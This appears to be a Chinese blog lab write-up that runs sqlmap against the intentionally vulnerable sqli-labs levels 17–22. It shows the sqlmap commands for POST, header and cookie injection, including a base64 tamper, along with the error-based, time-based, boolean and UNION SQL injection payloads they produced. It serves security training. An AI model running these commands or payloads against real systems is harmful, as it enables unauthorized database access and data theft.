热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

sqlmap刷sqllibs_03header注入1722

文章目录17、less17-UpdateQuery-Errorbased-String18、less18-HeaderInjection-ErrorBased-string19、l

文章目录

  • 17、less17-Update Query- Error based - String
  • 18、less18-Header Injection- Error Based- string
  • 19、less19- Header Injection- Referer- Error Based- string
  • 20、less20-COOKIE Injection- Error Based- string
  • 21、less21-COOKIE Injection- Error Based- complex - string
  • 22、less22-COOKIE Injection- Error Based- Double Quotes


17、less17-Update Query- Error based - String

在这一关中,uname参数经过了check_in()函数过滤,因此如果我们直接按照之前的进行过滤的话就会发现sqlmap很有可能会跑很久,这是因为uname不可注入,因此sqlmap就尝试这一切方法对他进行注入,所以时间花费很长。但是另外一个参数passwd并没有进行过滤,我们进行注入时就要指定参数。

本关同于第11关,具体语句不一一赘述了。
下面为sqlmap给出的payload:

C:\Python27\sqlmap>sqlmap.py -r "C:\Users\20544\Desktop\sqlmap.txt" --level=5 --risk=3 -p "passwd"

tips:最开始跑的时候发现跑不出来,在手工注入的时候发现是参数uname需要时存在的用户,否则无论passwd输入什么都是产生报错,因此uname需要是正确的,pass可以随意。如下图:
在这里插入图片描述
下面为sqlmap给出的paylaod:

sqlmap identified the following injection point(s) with a total of 1766 HTTP(s) requests:
---
Parameter: passwd (POST)Type: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin&passwd=11' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170766271,(SELECT (ELT(6944=6944,1))),0x717a7a6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- AKXd&submit=SubmitType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin&passwd=11' AND (SELECT 7917 FROM (SELECT(SLEEP(5)))uuIs)-- PayD&submit=Submit
---

下面18-20主要是关于http头部的注入。
关于详细的http头部介绍可以参考我的另外一篇文章链接:

https://blog.csdn.net/weixin_43901038/article/details/107640730

虽然文章中讲到了http头部的很多信息,但是长啊激动呢http注入点产生的位置如下:

referer、X-Forwarded-For、COOKIE、X-Real-IP、Accept-LanguageAuthorization

下面几篇有点尴尬,啥方法也都试了,就是跑不出来,我也不知道问题出在了那里,关于具体的参考方法请看下面的链接吧,这个等之后我有思路的时候再来进行补充!
对于sqli-labs基础篇全程使用sqlmap不用手工注入(七夕礼物!!!)

18、less18-Header Injection- Error Based- string

本关对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的。但是在代码中,我们看到了insert()

insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′uagent', 'IP′,uname)";

将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?
我们可以尝试一下。

额,我用 --level=5 --risk=3 把这个跑了一遍,事实就是,,,,跑了将近半个小时怎么都没有结果。
额,很好,我放弃了,,,,,下次再战!!!

19、less19- Header Injection- Referer- Error Based- string
20、less20-COOKIE Injection- Error Based- string

从源代码中我们可以看到COOKIE从username中获得值后,当再次刷新时,会从COOKIE中读取username,然后进行查询。

在这一关我们主要是对COOKIE进行注入,因此我们需要使用的参数 - - COOKIE 进行注入。
以下为本关的注入语句:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-20/" --COOKIE "uname=admin" --level=3

以下为sqlmap给出的paylaod:

sqlmap identified the following injection point(s) with a total of 2589 HTTP(s) requests:
---
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin' AND 2481=2481-- QeIxType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178706a71,(SELECT (ELT(1349=1349,1))),0x717a6b7a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- UgTTType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin' AND (SELECT 7130 FROM (SELECT(SLEEP(5)))Wpnx)-- sDNUType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: uname=-2470' UNION ALL SELECT CONCAT(0x7178706a71,0x7668714d64484c644a426d63435446537a65435a494a505a5a527a415572564a4a66575a72465375,0x717a6b7a71),NULL,NULL-- -
---

21、less21-COOKIE Injection- Error Based- complex - string

本关与第20关是类似的,但是本关对base64进行了编码。因此我们可以利用参数 - - tamper=base64encode 加载base64编码注入。

注入语句如下:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-21/" --COOKIE "uname=admin" --level=3 --tamper=base64encode

以下为sqlmap注入给出的payload:

sqlmap identified the following injection point(s) with a total of 2622 HTTP(s) requests:
---
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin') AND 5812=5812 AND ('DZPG' LIKE 'DZPGType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176787171,(SELECT (ELT(1502=1502,1))),0x7171767871,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('kEGe' LIKE 'kEGeType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin') AND (SELECT 8779 FROM (SELECT(SLEEP(5)))DSbJ) AND ('hRvK' LIKE 'hRvKType: UNION queryTitle: Generic UNION query (random number) - 3 columnsPayload: uname=-4185') UNION ALL SELECT 8255,CONCAT(0x7176787171,0x614e724f4e4b685754644d6575435249534b4d6e7a794e47637171466756557a4f58666a6e6d7346,0x7171767871),8255-- -
---

22、less22-COOKIE Injection- Error Based- Double Quotes

本关类似于第21关,只是在COOKIE前面加上了双引号。

如下为sqlmap的注入语句:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-22/" --COOKIE "uname=admin" --level=3 --tamper=base64encode

以下为sqlmap注入给出的payload:

sqlmap identified the following injection point(s) with a total of 2629 HTTP(s) requests:
---
Parameter: uname (COOKIE)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: uname=admin" AND 5788=5788 AND "ZhRs"="ZhRsType: error-basedTitle: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)Payload: uname=admin" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162716a71,(SELECT (ELT(5835=5835,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND "qffh"="qffhType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=admin" AND (SELECT 4753 FROM (SELECT(SLEEP(5)))zEdp) AND "wZxo"="wZxoType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: uname=-5156" UNION ALL SELECT NULL,CONCAT(0x7162716a71,0x73784a556468644e6d496c6a4d465573765670476174454c77754c6b6b42776f6c676e58736a6f7a,0x71766a7671),NULL-- -
---


推荐阅读
  • 深入解析Spring启动过程
    本文详细介绍了Spring框架的启动流程,帮助开发者理解其内部机制。通过具体示例和代码片段,解释了Bean定义、工厂类、读取器以及条件评估等关键概念,使读者能够更全面地掌握Spring的初始化过程。 ... [详细]
  • 烤鸭|本文_Spring之Bean的生命周期详解
    烤鸭|本文_Spring之Bean的生命周期详解 ... [详细]
  • 本文将介绍如何编写一些有趣的VBScript脚本,这些脚本可以在朋友之间进行无害的恶作剧。通过简单的代码示例,帮助您了解VBScript的基本语法和功能。 ... [详细]
  • 本文详细介绍了如何在Linux系统上安装和配置Smokeping,以实现对网络链路质量的实时监控。通过详细的步骤和必要的依赖包安装,确保用户能够顺利完成部署并优化其网络性能监控。 ... [详细]
  • 深入理解 SQL 视图、存储过程与事务
    本文详细介绍了SQL中的视图、存储过程和事务的概念及应用。视图为用户提供了一种灵活的数据查询方式,存储过程则封装了复杂的SQL逻辑,而事务确保了数据库操作的完整性和一致性。 ... [详细]
  • 使用 Azure Service Principal 和 Microsoft Graph API 获取 AAD 用户列表
    本文介绍了一段通用代码示例,该代码不仅能够操作 Azure Active Directory (AAD),还可以通过 Azure Service Principal 的授权访问和管理 Azure 订阅资源。Azure 的架构可以分为两个层级:AAD 和 Subscription。 ... [详细]
  • 深入解析Spring Cloud Ribbon负载均衡机制
    本文详细介绍了Spring Cloud中的Ribbon组件如何实现服务调用的负载均衡。通过分析其工作原理、源码结构及配置方式,帮助读者理解Ribbon在分布式系统中的重要作用。 ... [详细]
  • Startup 类配置服务和应用的请求管道。Startup类ASP.NETCore应用使用 Startup 类,按照约定命名为 Startup。 Startup 类:可选择性地包括 ... [详细]
  • 配置PHPStudy环境并使用DVWA进行Web安全测试
    本文详细介绍了如何在PHPStudy环境下配置DVWA( Damn Vulnerable Web Application ),并利用该平台进行SQL注入和XSS攻击的练习。通过此过程,读者可以熟悉常见的Web漏洞及其利用方法。 ... [详细]
  • 本文将详细介绍通过CAS(Central Authentication Service)实现单点登录的原理和步骤。CAS由耶鲁大学开发,旨在为多应用系统提供统一的身份认证服务。文中不仅涵盖了CAS的基本架构,还提供了具体的配置实例,帮助读者更好地理解和应用这一技术。 ... [详细]
  • 本文详细探讨了在微服务架构中,使用Feign进行远程调用时出现的请求头丢失问题,并提供了具体的解决方案。重点讨论了单线程和异步调用两种场景下的处理方法。 ... [详细]
  • QNX 微内核(procnto-instr)的监测版本内置了高级跟踪与分析工具,能够实现实时系统监控。该模块适用于单处理器及多处理器系统。 ... [详细]
  • EasyMock实战指南
    本文介绍了如何使用EasyMock进行单元测试,特别是当测试对象的合作者依赖于外部资源或尚未实现时。通过具体的示例,展示了EasyMock在模拟对象行为方面的强大功能。 ... [详细]
  • 本文探讨了如何通过WebBrowser控件在用户点击输入框时自动显示图片验证码。该过程可能涉及JavaScript事件的触发与响应。 ... [详细]
  • Flowable系列教程:运用ProcessEngineConfigurator实现高级流程引擎配置
    本文探讨了通过ProcessEngineConfigurator接口实现对Flowable流程引擎的高级配置方法。这种方法允许开发者通过自定义配置器来增强或修改流程引擎的行为。 ... [详细]
author-avatar
快乐皇妃800
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有